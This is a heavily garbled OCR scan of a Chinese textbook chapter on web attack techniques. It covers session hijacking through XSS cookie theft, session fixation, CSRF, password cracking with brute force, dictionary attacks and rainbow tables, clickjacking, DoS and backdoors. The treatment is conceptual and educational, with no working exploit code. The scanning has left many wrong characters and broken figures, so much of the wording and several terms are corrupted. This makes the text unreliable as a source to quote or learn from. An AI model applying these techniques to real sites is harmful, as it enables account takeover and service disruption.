图 : 会 话 动 持 


具备 认证 功能 的 Web 应 用 ， 使 用 会 话 ID 的 会 话 管理 机 制 ， 作 为 管 
理 认 证 状态 的 主流 方式 。 会 话 ID 中 记录 客户 端的 Cookie 等 信息 ， 服 务 
器 端 将 会 话 ID 与 认证 状态 进行 一 对 一 匹配 管理 。 

下 面 列举 了 几 种 攻击 者 可 获得 会 话 ID 的 途径 。 


@ 通过 非 正规 的 生成 方法 推测 会 话 ID 
9 通过 窃听 或 XSS 攻击 盗 取 会 请 ID 
9 通过 会 话 固 定 攻 击 ( Session Fixation ) 强行 获取 会 话 ID 


国会 话 劫持 攻击 案例 

下 面 我 们 以 认证 功能 为 例 讲 解 会 话 劫持 。 这 里 的 认证 功能 通过 会 话 
管理 机 制 ， 会 将 成 功 认 证 的 用 户 的 会 话 ID ( SID ) 保存 在 用 户 浏览 絮 的 
Cookie 中 。 
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wii ee 人 






= Cookie 
I SID=f5d1278e8109 


- 全 欢迎 山口 先生 | 
通过 XSS 攻击 , 设置 利用 JavaScript 脚 本 调用 
document.cookie 以 窃取 Cookie 信 息 的 陷阱 ， 
资 走 用 户 的 会 话 IDI( SID ) 


SID=f5d1278e8109 
全 攻击 者 将 此 SID 设置 到 


攻击 者 自己 的 浏览 器 Cookie 中 









图 : 会 话 劫持 攻击 案例 


攻击 肴 在 得 知 该 Web 网 站 存在 可 器 站 攻击 ( XSS ) 的 安全 漏洞 后 ， 
就 设置 好 用 JavaScript 脚本 调用 document.cookie 以 究 取 Cookie 信息 的 
陷阱 ， 一 旦 用 户 踏 入 陷阱 (访问 了 该 脚本 )， 攻 击 者 就 能 获取 含有 会 话 
ID 的 Cookie。 

攻击 者 拿 到 用 户 的 会 话 四 后 , 往 自己 的 浏览 器 的 Cookie 中 设置 该 
会 话 ID ， 即 可 伪装 成 会 话 ID 遵 锚 的 用 户 , 访问 Web 网 站 了 。 


11.4.2 会 话 固定 攻击 

对 以 窃取 目标 会 话 ID 为 主动 攻击 手段 的 会 话 劫持 而 言 ， 会 话 固定 
攻击 ( Session Fixation ) 攻击 会 强制 用 户 使 用 攻击 者 指定 的 会 话 ID， 属 
于 被 动 攻击 。 


国会 话 固定 攻击 案例 

下 面 我 们 以 认证 功能 为 例 讲解 会 话 固定 攻击 。 这 个 Web 网 站 的 认 
证 功能 ， 会 在 认证 前 发 布 一 个 会 话 ID， 若 认证 成 功 ， 就 会 在 服务 器 内 
改变 认证 状态 。 





ee 





3 -中 访问 登录 页 面 rm 
(i @ 服 务 器 发 布 一 个 会 话 ID 
攻击 者 http://fexample.com/login?SID=f5d1278e8109 
该 会 话 1D 为 ( 未 认证 ) 状 态 


(3) 将 (@ 中 的 URL 作 为 陷阱 ,诱导 用 户 前 去 认证 





认证 后 , 会 话 ID 变 为 ( 用 户 A 已 认证 ) 状 态 


全 团 之 后 再 用 @ 中 的 URL 访 问 
和 


攻击 者 








图 : 会 话 固定 攻击 案例 


攻击 者 准备 陷阱 ， 先 访问 Web 网 站 拿 到 会 话 ID ( SID=f5d1278e8109 )。 
此 刻 ， 会 话 中 在 服务 器 上 的 记录 仍 是 ( 未 认证 ) 状态 。( 步骤 ~ 四) ) 

攻击 者 设置 好 强制 用 户 使 用 该 会 话 ID 的 陷阱 ， 并 等 待 用 户 拿 着 这 
个 会 话 了 前 去 认证 。 一旦 用 户 触 发 陷阱 并 完成 认证 ,会话 闸 
( SID=f5d1278e8109 ) 在 服务 侨 上 的 状态 ( 用户 A 已 认证 ) 就 会 被 记录 
下 来 。( 步骤 @) ) 

攻击 独 佑 计 用 户 差不多 已 触发 陷阱 后 ， 再 利用 之 前 这 个 会 话 ID 访 
问 网 站 。 由 于 该 会 话 中 目前 已 是 (用户 A 已 认证 ) 状态 ， 于 是 攻击 者 
作为 用 户 A 的 身份 顺利 登录 网 站 。( 步骤 @ ) 


Session Adoption 

Session Adoption 是 指 PHP 或 ASPNET 能 够 接收 处 理 未 知 会 话 ID 
的 功能 。 

亚 意 使 用 该 功能 便 可 跳 过 会 话 固定 攻击 的 准备 阶段 ， 从 Web 网 站 
获得 发 行 的 会 话 ID 的 步骤 。 即 ， 攻 击 者 可 私自 创建 会 话 ID 构成 陷阱 ， 
中 间 件 却 会 误 以 为 该 会 话 ID 是 未 知 会 话 ID 而 接受 
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11.4.3 ” 跨 站 点 请 求 伪造 

跨 站 点 请 求 伪造 ( Cross-Site Request Forgeries，CSRF ) 攻击 是 指 攻 
击 者 通过 议 置 好 的 陷阱 ， 强 制 对 已 完成 认证 的 用 户 进行 非 预期 的 个 人 信 
息 或 设 定 信息 等 某 些 状态 更 新 ， 属 于 被 动 攻 击 。 

路 站 点 请 求 伪造 有 可 能 会 造成 以 下 等 影响 。 


e 利用 已 通过 认证 的 用 户 权 限 更 新 设 定 信 息 等 
e 利用 已 通过 认证 的 用 户 权限 购买 商品 
e 利用 已 通过 认证 的 用 记 权 限 在 留言 板 上 发 表 言 论 


国 跨 站 点 请 求 伪 造 的 攻击 案例 
下 面 以 留言 板 功能 为 例 ， 讲 解 跨 站 点 请 求 伪造 。 该 功能 只 允许 已 认 
证 并 登录 的 用 户 在 留言 板 上 发 表 内 容 。 








中 认证 通过 用 户 A 身份 


用 户 , A 的 浏览 妖 中 的 Cookie 持 有 已 认证 的 会 话 | ID， 利用 用 户 A 的 
权限 执行 发 表 动 作 


图 : 跨 站 点 请 求 伪 造 的 攻击 案例 








在 该 留言 板 系 统 上 ， 受 害 者 用 户 A 是 已 认证 状态 。 它 的 浏览 关中 
的 Cookie 持 有 已 认证 的 会 话 ID( 步骤 册 )。 

攻击 者 设置 好 一 旦 用 户 访 问 ， 即 会 发 送 在 留言 板 上 发 表 非 主观 行为 
产生 的 评论 的 请 求 的 陷阱 。 用 户 A 的 浏览 器 执行 完 陷阱 中 的 请 求 后 ， 
留言 板 上 也 就 会 留 下 那 条 评论 ( 步骤 @ )。 

触发 陷阱 之 际 ， 如 果 用 户 A 尚未 通过 认证 ， 则 无 法 利用 用 户 A 的 
身份 权限 在 留言 板 上 发 表 内 容 。 


11.5 ”其 他 安全 漏洞 


11.5.1 密码 破解 

密码 破解 攻击 ( Password Cracking ) 即 算 出 密码 ， 突 破 认 证 。 攻 击 
不 仅 限 于 Web 应 用 ， 还 包括 其 他 的 系统 (如 FTP 或 SSH 等 )， 本 节 将 
会 讲解 对 具备 认证 功能 的 Web 应 用 进行 的 密码 破解 。 


密码 破解 有 以 下 两 种 手段 。 

s 通过 网 络 的 密码 试 错 

9 对 已 加 密 密 码 的 破解 ( 指 攻击 者 入 侵 系 统 ， 已 获得 加 密 或 散 列 处 理 
的 密码 数据 的 情况 ) 


除去 突破 认证 的 攻击 手段 ,还 有 SQL 注 和 攻击 逃避 认证 ， 路 站 脚 
本 攻击 贸 取 和 密 公 信息 等 方法 。 


国 通 过 网 络 进 行 密码 试 第 

对 Web 应 用 提供 的 认证 功能 ， 通 过 网 络 尝试 候选 密码 进行 的 一 种 
攻击 。 主 要 有 以 下 两 种 方式 。 

9 穷 举 法 

9 字典 攻击 
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穷 举 法 

穷 举 法 ( Brute-force Attack， 又 称 暴力 破解 法 ) 是 指 对 所 有 密 钥 集 
合 构成 的 密 钥 空间 ( Keyspace ) 进行 穷 举 。 即 ， 用 所 有 可 行 的 候选 密码 
对 目标 的 密码 系统 试 错 ， 用 以 突破 验证 的 一 种 攻击 。 

比如 银行 采用 的 个 人 识别 码 是 由 “4 位 数字 ”组 成 的 密码 ， 那 么 就 
要 从 0000~9999 中 的 全 部 数 子 逐 个 进行 尝试 。 这 样 一 来 ， 必 定 在 候选 的 
密码 集合 中 存在 一 个 正确 的 密码 ， 可 通过 认证 。 

因为 穷 举 法 会 尝试 所 有 的 候选 密码 ， 所 以 是 一 种 必然 能 够 破解 密码 
的 攻击 。 但 是 ， 当 密 钥 空 间 很 庞大 时 ， 解 密 可 能 需要 花费 数 年 ， 甚 至 千 
年 的 时 间 ， 因 此 从 现实 角度 考量 ， 攻 击 是 失败 的 。 


字典 攻击 

字典 攻击 是 指 利用 事先 收集 好 的 候选 密码 ( 经 过 各 种 组 合 方 式 后 存 
入 字典 )， 枚 举 字典 中 的 密码 ， 尝 试 通过 认证 的 一 种 攻击 手法 。 

还 是 举 银行 采用 个 人 识别 码 是 “4 位 数字 ”的 密码 的 例子 ， 考 虑 到 
用 户 使 用 自己 的 生日 做 密码 的 可 能 性 较 高 ， 于 是 就 可 以 把 生日 日 期 数值 
化 ， 如 将 0101~1231 保存 成 字典 ， 进 行 尝试 。 

与 穷 举 法 相 比 ， 由 于 需要 尝试 的 候选 密码 较 少 ， 意 味 着 攻击 耗费 的 
时 间 比 较 短 。 但 是 ， 如 果 字 典 中 没有 正确 的 密码 ， 那 就 无 法 破解 成 功 。 
因此 攻击 的 成 败 取决 于 字典 的 内 容 。 











0000 
0001 
0002 


0010 
0011 





i / 
0816 


正确 | 一 一 一 


0817 , 
i 使 用 4 位 数 生日 日 期 数字 列表 
( 最 多 尝试 366 次 ) 


以 4 位 数字 的 全 组 合 进行 穷 举 法 
3 ns 
【最 多 尝试 10 000 次 ) 使 用 字典 可 缩短 得 到 正确 密码 的 时 
间 , 但 如 果 密码 不 在 字典 中 就 无 法 
肯定 能 在 某 次 尝试 时 得 到 正确 密码 正确 匹配 


* 前 提 条 件 是 知道 密码 只 使 用 4 位 数 以 内 的 数字 组 成 
: 穷 举 法 和 字典 攻击 





烘 攻击 中 有 种 利用 其 他 Web 风 站 已 江 吉 的 ID 及 密码 列表 进行 的 


很 多 用 户 习 避 随意 地 在 多 个 Web 网 站 使 用 同一 大 D 及 密码 ,因此 
攻击 人 ss 。 


国 对 已 加 密 密 码 的 破解 
Web 应 用 在 保存 密码 时 ， 一 般 不 会 直接 以 明文 的 方式 保存 ， 退 过 秘 
(DD 根据 警方 的 调查 统计 ,成功 入 侵 率 有 6.7%。 平成 23 年 (2011 年 ) 公布 的 非 


法 访问 行为 的 具体 发 生 状 况 请 参见 http://www.npa.go.jp/cyber/statics/h23/ 
pdf040.pdf 


第 11 章 Web 的 攻击 技术 


列 函 数 做 敌 列 处 理 或 加 salt 的 手段 对 要 保存 的 密码 本 身 加 密 。 那 即使 攻 
击 者 使 用 某 些 手段 祝 取 密码 数据 ， 如 果 想 要 真正 使 用 这 些 密码 ， 则 必须 
先 通过 解码 等 手段 ， 把 加 密 处 理 的 密码 还 原 成 明文 形式 。 
















站 密码 注册 时 
原来 的 密码 。 散 列 函数 以 散 列 值 保存 加 
abc ——»|MDS 900150983cd24fb0d6963f7d28e17f72 
服务 器 端 只 保存 散 列 值 , 不 保存 原来 的 明文 密码 。 
在 生成 散 列 值 时 ,使 用 加 salt 或 扩展 密码 长 度 的 安全 策略 
FB 认证 时 
试 错 用 的 字符 捉 。 散 列 函数 跟 忠 中 保存 的 散 列 值 匹配 
| abc 上 一 >| MD5 | 0983cd24fb0d6963f7d28e17f72 








如 果 @) 的 散 列 值 和 中 中 的 保存 的 字符 捉 匹 配 一 致 则 表明 认证 成 功 | 





图 : 破解 已 加 密 的 密码 
从 加 密 过 的 数据 中 寻 出 明文 通 稍 有 以 下 几 种 方法 。 


9 通过 穷 举 法 * 字典 攻击 进行 类 推 


9 彩虹 表 
9 拿 到 密 钥 
se 加 密 算法 的 漏洞 


通过 穷 举 法 . 字典 攻击 进行 类 推 

针对 密码 使 用 散 列 函数 进行 加 密 处 理 的 情况 ， 采 用 和 人 穷 举 法 或 字典 
攻击 相同 的 手法 ， 尝 试 调用 相同 的 散 列 函 数 加 密 候选 密码 ， 然 后 把 计算 
出 的 散 列 值 与 目标 散 列 值 匹配 ， 类 推出 密码 。 





攻击 者 拿 到 的 散 列 值 


900150983cd24fb0d6963f7d28e17f72 






0Occ175b9c0f1b6a831c399e269772661 
# 92eb5ffee6ae2fec3ad71c777531578f 
本 b73795649038408b5f33 


900150983cd24fb0d6963f7d28e17f72 


,02441dd7f66c49c82cef55354f467149 
| 02c425157ecd32f259548b33402ff6d3 





图 : 破解 已 加 密 的 密码 / 通过 穷 举 法 * 字典 攻击 进行 类 推 


彩虹 表 
彩虹 表 ( Rainbow Table ) 是 由 明文 密码 及 与 之 对 应 的 散 列 值 构成 的 
一 张 数 据 库 表 ， 是 一 种 通过 事先 制作 庞大 的 彩虹 表 ， 可 在 穷 举 法 ， 字 典 
攻击 等 实际 破解 过 程 中 缩短 消耗 时 间 的 技巧 。 从 彩虹 表 内 搜索 散 列 值 就 
可 以 推导 出 对 应 的 明文 密码 。 
从 彩虹 表 搜 索 散 列 值 推导 出 明文 





Ee 
图 : 破解 已 加 密 的 密码 / 彩虹 表 


为 了 提高 攻击 成 功率 ， 拥 有 一 张 海 量 数据 的 彩虹 表 就 成 了 必 不 可 少 的 
条 件 。 例 如 在 Free Rainbow Tables 网 站 上 (http://www.freerainbowtables. 
com/en/tables2/ ) 公布 的 一 张 由 大 小 写字 母 及 数字 全 排列 的 1~8 位 字符 
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串 对 应 的 MD5 散 列 值 构成 的 彩虹 表 ， 其 大 小 约 为 1050 吝 宁 让。 


拿 到 密 钉 
使 用 共享 密 钥 加 密 方式 对 密码 数据 进行 加 密 处 理 的 情况 下 ， 如 采 能 
通过 某 种 手段 拿 到 加 密使 用 的 密 钥 ， 也 就 可 以 对 密码 数据 解密 了 。 


加 密 算法 的 漏洞 

考虑 到 加 密 算法 本 身 可 能 存在 的 漏洞 ， 利 用 该 漏洞 尝试 解密 也 是 一 
种 可 行 的 方法 。 但 是 要 找到 那些 已 广泛 使 用 的 加 密 算法 的 漏洞 ， 又 谈 何 容 
易 ， 因 此 困难 极 大 ,不 易 成 功 。 

而 Web 应 用 开发 者 独立 实现 的 加 密 算 法 ， 想 必 尚 未 经 过 充分 的 验证 ， 
还 是 很 有 可 能 存在 漏洞 的 。 


11.5.2 ”点 击 支持 
点 击 支持 ( Clickjacking ) 是 指 利用 透明 的 按钮 或 链接 做 成 陷阱 ， 禾 
盖 在 Web 页 面 之 上 。 然 后 诱 使 用 户 在 不 知情 的 情况 下 ， 点 击 那 个 链接 
访问 内 容 的 一 种 攻击 手段 。 这 种 行为 又 称 为 界面 伪装 ( UI Redressing )。 
已 设置 陷阱 的 Web 页 面 ， 表 面 上 内 容 并 无 不 妥 ， 但 早已 坦 人 想 让 
用 户 点 击 的 链接 。 当 用 户 点 击 到 透明 的 按钮 时 ， 实 际 上 是 点 击 了 已 指定 
透明 属性 元 素 的 iframe 页 面 。 


图 点 击 动 持 的 攻击 案例 

下 面 以 SNS 网 站 的 注销 功能 为 例 ， 讲 解 点 击 劫持 攻击 。 利 用 该 注 
销 功能 ， 注 册 登 录 的 SNS 用 户 只 需 点 击 注销 按钮 ， 就 可 以 从 SNS 网 站 
上 注销 自己 的 会 员 身 份 。 











从 表面 上 看 , 这 些 网 站 ( 游戏 网 站 ) 没 有 什么 不 正常 的 地 方 


图 : 点 击 劫持 


攻击 者 在 预料 用 户 会 点 击 的 Web 页 面 上 设 下 陷阱 。 上 图 中 钓鱼 游 
戏 页 面 上 的 PLAY 按钮 就 是 这 类 陷阱 的 实例 。 

在 做 过 手脚 的 Web 页 面 上 ， 目 标的 SNS 注销 功能 页 面 将 作为 透明 
层 履 盖 在 游戏 网 页 上 。 履 盖 时 ， 要 保证 PLAY 按钮 与 注销 按钮 的 页 面 所 
在 位 置 保持 一 致 。 
iframe 页 面 中 使 用 透明 可 点 击 按钮 的 示例 





由 于 SNS 网 站 作为 透明 层 被 覆盖 ，SNS 网 站 上 处 于 登录 状态 的 用 
户 访问 这 个 钓鱼 网 站 并 点 击 页 面 上 的 PLAY 按钮 之 后 ， 等 同 于 点 击 了 
SNS 网 站 的 注销 按钮 。 


第 11 章 Web 的 攻击 技术 


11.5.3 ”DosS 攻击 


Dos 攻击 ( Denial of Service attack ) 是 一 种 让 运行 中 的 服务 呈 停 止 
状态 的 攻击 。 有 时 也 叫做 服务 停止 攻击 或 拒绝 服务 攻击 。Dos 攻击 的 对 
象 不 仅 限 于 Web 网 站 ， 还 包括 网 络 设备 及 服务 器 等 。 

主要 有 以 下 两 种 DoS 攻击 方式 。 


9 集中 利用 访问 请 求 造 成 资源 过 载 ， 资 源 用 尽 的 同时 ， 实 际 上 服务 也 
就 呈 停 止 状 态 。 
9 通过 攻击 安全 漏洞 使 服务 停止 。 


其 中 ， 集 中 利用 访问 请 求 的 DoS 攻击 ， 单 纯 来 讲 就 是 发 送 大 量 的 


合法 请 求 。 服 务 右 很 难 分 辨 何 为 正常 请 求 ， 何 为 攻击 请 求 ， 因 此 很 难 防 
止 DoS 攻击 。 


海量 请 求实 际 导 致 服务 呈现 停止 状态 





攻击 安全 漏洞 使 服务 停止 
瞄准 会 导致 服务 停止 的 
eh 安全 漏洞 展开 攻击 


图 : DoS 攻击 





多 台 计 算 机 发 起 的 DoS 攻击 称 为 DDoS 攻击 ( Distributed Denial of 
Service attack )。DDos 攻击 通常 利用 那些 感染 病毒 的 计算 机 作为 攻击 者 
的 攻击 跳板 。 





11.5.4 后门 程序 

后 门 程序 ( Backdoor ) 是 指 开发 设置 的 隐藏 人 入口 ， 可 不 按 正常 步骤 
使 用 受 限 功能 。 利 用 后 门 程序 就 能 够 使 用 原本 受 限制 的 功能 。 

通常 的 后 门 程序 分 为 以 下 3 种 类 型 。 


e 开发 阶段 作为 Debug 调用 的 后 门 程序 
e@ 开发 者 为 了 自身 利益 植 入 的 后 门 程 序 
9 攻击 者 通过 某 种 方法 设置 的 后 门 程 序 


可 通过 监视 进程 和 通信 的 状态 发 现 被 植 人 的 后 门 程序 。 但 设 定 在 
Web 应 用 中 的 后 门 程序 ， 由 于 和 正常 使 用 时 区 别 不 大 ， 通 常 很 难 发 现 。 





